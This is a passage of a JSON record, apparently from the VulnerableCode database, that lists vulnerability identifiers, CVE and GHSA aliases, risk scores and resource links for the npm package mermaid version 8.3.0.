                        {
                            "vulnerability": "VCID-fgz4-kbun-23bn"
                        },
                        {
                            "vulnerability": "VCID-fwuk-z3uk-1ygf"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/mermaid@8.11.0"
                }
            ],
            "aliases": [
                "CVE-2021-35513",
                "GHSA-4f6x-49g2-99fm"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x94b-cysu-4fbe"
        }
    ],
    "fixing_vulnerabilities": [],
    "risk_score": "4.0",
    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/mermaid@8.3.0"
}